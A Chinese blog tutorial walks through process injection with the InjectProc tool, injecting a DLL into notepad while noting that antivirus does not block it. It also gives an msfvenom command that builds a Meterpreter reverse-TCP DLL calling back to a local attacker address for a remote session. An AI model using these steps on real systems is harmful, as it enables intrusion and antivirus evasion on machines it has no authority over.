最新消息:

InjectProc&Metasploit

Kali Linux demon 3662浏览 0评论

InjectProc

流程注入是一种非常受欢迎的隐藏恶意代码的方法,被恶意软件作者广泛使用。

通常有这几种注入手段:DLL注入,过程替换(也称为工艺空心),钩注射和APC注射。

大多数使用相同的Windows API函数:OpenProcess,VirtualAllocEx,WriteProcessMemory,有关这些功能的详细信息,请使用MSDN。

DLL注入:

打开目标进程。
分配空间
将代码写入远程进程。
执行远程代码。

具体可以看看github内容介绍。

我看了大牛的视频自己学着模仿了一下

使用的InjectProc.exe在cmd运行:

这位大牛在视频中演示四个部分,我自己也尝试了模仿了其中的一段,觉得不错,我将自己经验分享给各位。

我使用的是—— InjectProc.exe dll_inj path/to/dll.dll notepad.exe

下载至桌面:https://github.com/secrary/InjectProc ,和下载InjectProc.exe 。

0x01

首先打开我们的cmd 进入 InjectProc 目录中,我们可以看到:

我们运行InjectProc.exe,并且使用dll_inj 参数,加上xxx.dll的路径 ,加上要注入的进程?InjectProc.exe dll_inj path/to/dll.dll notepad.exe。

在这里我们使用InjectProc\test_files目录中的,并且我们随机打开一个进程,如记事本进程。
使用以下命令:得到 mbox.exe—-InjectProc弹框。可以看到,杀软并未拦截!

0x02

这里让我联想到了前阵子NSA工具包,使用msf生成的dll得到会话。我们可以做下以下操作。

首先,我们使用msfvenom生成dll:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=5555 -f dll >demon.dll

其次,开启我们的msf监听:

接着,我们将生成好的dll丢到InjectProc目录中的随便一个文件中,比如我丢到InjectProc\test_files中:

使用以下命令,并打开记事本:

得到最终会话:

视频演示:

转载请注明:即刻安全 » InjectProc&Metasploit

您必须 登录 才能发表评论!



合作伙伴